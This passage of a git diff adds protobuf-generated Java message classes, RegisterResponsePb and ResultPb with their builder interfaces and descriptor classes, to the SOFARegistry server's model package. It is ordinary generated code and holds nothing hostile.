{ + return com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePbOuterClass + .internal_static_RegisterResponsePb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePbOuterClass + .internal_static_RegisterResponsePb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb.class, + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + success_ = false; + + registId_ = ""; + + version_ = 0L; + + refused_ = false; + + message_ = ""; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePbOuterClass + .internal_static_RegisterResponsePb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb build() { + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb result = + new com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb(this); + result.success_ = success_; + result.registId_ = registId_; + result.version_ = version_; + result.refused_ = refused_; + result.message_ = message_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb + .getDefaultInstance()) return this; + if (other.getSuccess() != false) { + setSuccess(other.getSuccess()); + } + if (!other.getRegistId().isEmpty()) { + registId_ = other.registId_; + onChanged(); + } + if (other.getVersion() != 0L) { + setVersion(other.getVersion()); + } + if (other.getRefused() != false) { + setRefused(other.getRefused()); + } + if (!other.getMessage().isEmpty()) { + message_ = other.message_; + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private boolean success_; + /** bool success = 1; */ + public boolean getSuccess() { + return success_; + } + /** bool success = 1; */ + public Builder setSuccess(boolean value) { + + success_ = value; + onChanged(); + return this; + } + /** bool success = 1; */ + public Builder clearSuccess() { + + success_ = false; + onChanged(); + return this; + } + + private java.lang.Object registId_ = ""; + /** string registId = 2; */ + public java.lang.String getRegistId() { + java.lang.Object ref = registId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + registId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string registId = 2; */ + public com.google.protobuf.ByteString getRegistIdBytes() { + java.lang.Object ref = registId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + registId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string registId = 2; */ + public Builder setRegistId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + registId_ = value; + onChanged(); + return this; + } + /** string registId = 2; */ + public Builder clearRegistId() { + + registId_ = getDefaultInstance().getRegistId(); + onChanged(); + return this; + } + /** string registId = 2; */ + public Builder setRegistIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + registId_ = value; + onChanged(); + return this; + } + + private long version_; + /** int64 version = 3; */ + public long getVersion() { + return version_; + } + /** int64 version = 3; */ + public Builder setVersion(long value) { + + version_ = value; + onChanged(); + return this; + } + /** int64 version = 3; */ + public Builder clearVersion() { + + version_ = 0L; + onChanged(); + return this; + } + + private boolean refused_; + /** bool refused = 4; */ + public boolean getRefused() { + return refused_; + } + /** bool refused = 4; */ + public Builder setRefused(boolean value) { + + refused_ = value; + onChanged(); + return this; + } + /** bool refused = 4; */ + public Builder clearRefused() { + + refused_ = false; + onChanged(); + return this; + } + + private java.lang.Object message_ = ""; + /** string message = 5; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string message = 5; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string message = 5; */ + public Builder setMessage(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + message_ = value; + onChanged(); + return this; + } + /** string message = 5; */ + public Builder clearMessage() { + + message_ = getDefaultInstance().getMessage(); + onChanged(); + return this; + } + /** string message = 5; */ + public Builder setMessageBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + message_ = value; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:RegisterResponsePb) + } + + // @@protoc_insertion_point(class_scope:RegisterResponsePb) + private static final com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public RegisterResponsePb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new RegisterResponsePb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePbOrBuilder.java new file mode 100644 index 000000000..a2becb2e7 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePbOrBuilder.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface RegisterResponsePbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:RegisterResponsePb) + com.google.protobuf.MessageOrBuilder { + + /** bool success = 1; */ + boolean getSuccess(); + + /** string registId = 2; */ + java.lang.String getRegistId(); + /** string registId = 2; */ + com.google.protobuf.ByteString getRegistIdBytes(); + + /** int64 version = 3; */ + long getVersion(); + + /** bool refused = 4; */ + boolean getRefused(); + + /** string message = 5; */ + java.lang.String getMessage(); + /** string message = 5; */ + com.google.protobuf.ByteString getMessageBytes(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePbOuterClass.java new file mode 100644 index 000000000..c22e22042 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/RegisterResponsePbOuterClass.java @@ -0,0 +1,67 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class RegisterResponsePbOuterClass { + private RegisterResponsePbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor + internal_static_RegisterResponsePb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_RegisterResponsePb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\030RegisterResponsePb.proto\"j\n\022RegisterRe" + + "sponsePb\022\017\n\007success\030\001 \001(\010\022\020\n\010registId\030\002 " + + "\001(\t\022\017\n\007version\030\003 \001(\003\022\017\n\007refused\030\004 \001(\010\022\017\n" + + "\007message\030\005 \001(\tB7\n/com.alipay.sofa.regist" + + "ry.common.model.client.pbP\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] {}, assigner); + internal_static_RegisterResponsePb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_RegisterResponsePb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_RegisterResponsePb_descriptor, + new java.lang.String[] { + "Success", "RegistId", "Version", "Refused", "Message", + }); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPb.java new file mode 100644 index 000000000..3248a892b --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPb.java @@ -0,0 +1,564 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code ResultPb} */ +public final class ResultPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:ResultPb) + ResultPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use ResultPb.newBuilder() to construct. + private ResultPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private ResultPb() { + success_ = false; + message_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private ResultPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 8: + { + success_ = input.readBool(); + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + + message_ = s; + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.ResultPbOuterClass + .internal_static_ResultPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.ResultPbOuterClass + .internal_static_ResultPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ResultPb.class, + com.alipay.sofa.registry.common.model.client.pb.ResultPb.Builder.class); + } + + public static final int SUCCESS_FIELD_NUMBER = 1; + private boolean success_; + /** bool success = 1; */ + public boolean getSuccess() { + return success_; + } + + public static final int MESSAGE_FIELD_NUMBER = 2; + private volatile java.lang.Object message_; + /** string message = 2; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } + } + /** string message = 2; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (success_ != false) { + output.writeBool(1, success_); + } + if (!getMessageBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, message_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (success_ != false) { + size += com.google.protobuf.CodedOutputStream.computeBoolSize(1, success_); + } + if (!getMessageBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, message_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.ResultPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.ResultPb other = + (com.alipay.sofa.registry.common.model.client.pb.ResultPb) obj; + + boolean result = true; + result = result && (getSuccess() == other.getSuccess()); + result = result && getMessage().equals(other.getMessage()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + SUCCESS_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(getSuccess()); + hash = (37 * hash) + MESSAGE_FIELD_NUMBER; + hash = (53 * hash) + getMessage().hashCode(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom(byte[] data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.ResultPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code ResultPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:ResultPb) + com.alipay.sofa.registry.common.model.client.pb.ResultPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.ResultPbOuterClass + .internal_static_ResultPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.ResultPbOuterClass + .internal_static_ResultPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ResultPb.class, + com.alipay.sofa.registry.common.model.client.pb.ResultPb.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.ResultPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + success_ = false; + + message_ = ""; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.ResultPbOuterClass + .internal_static_ResultPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.ResultPb getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.ResultPb.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.ResultPb build() { + com.alipay.sofa.registry.common.model.client.pb.ResultPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.ResultPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.ResultPb result = + new com.alipay.sofa.registry.common.model.client.pb.ResultPb(this); + result.success_ = success_; + result.message_ = message_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.ResultPb) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.ResultPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.ResultPb other) { + if (other == com.alipay.sofa.registry.common.model.client.pb.ResultPb.getDefaultInstance()) + return this; + if (other.getSuccess() != false) { + setSuccess(other.getSuccess()); + } + if (!other.getMessage().isEmpty()) { + message_ = other.message_; + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.ResultPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.ResultPb) e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private boolean success_; + /** bool success = 1; */ + public boolean getSuccess() { + return success_; + } + /** bool success = 1; */ + public Builder setSuccess(boolean value) { + + success_ = value; + onChanged(); + return this; + } + /** bool success = 1; */ + public Builder clearSuccess() { + + success_ = false; + onChanged(); + return this; + } + + private java.lang.Object message_ = ""; + /** string message = 2; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string message = 2; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string message = 2; */ + public Builder setMessage(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + message_ = value; + onChanged(); + return this; + } + /** string message = 2; */ + public Builder clearMessage() { + + message_ = getDefaultInstance().getMessage(); + onChanged(); + return this; + } + /** string message = 2; */ + public Builder setMessageBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + message_ = value; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:ResultPb) + } + + // @@protoc_insertion_point(class_scope:ResultPb) + private static final com.alipay.sofa.registry.common.model.client.pb.ResultPb DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.ResultPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ResultPb getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public ResultPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new ResultPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.ResultPb getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPbOrBuilder.java new file mode 100644 index 000000000..b13b7c37a --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ResultPbOrBuilder.java @@ -0,0 +1,31 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface ResultPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:ResultPb) + com.google.protobuf.MessageOrBuilder { + + /** bool success = 1; */ + boolean getSuccess(); + + /** string message = 2; */ + java.lang.String getMessage(); + /** string message = 2; */ + com.google.protobuf.ByteString 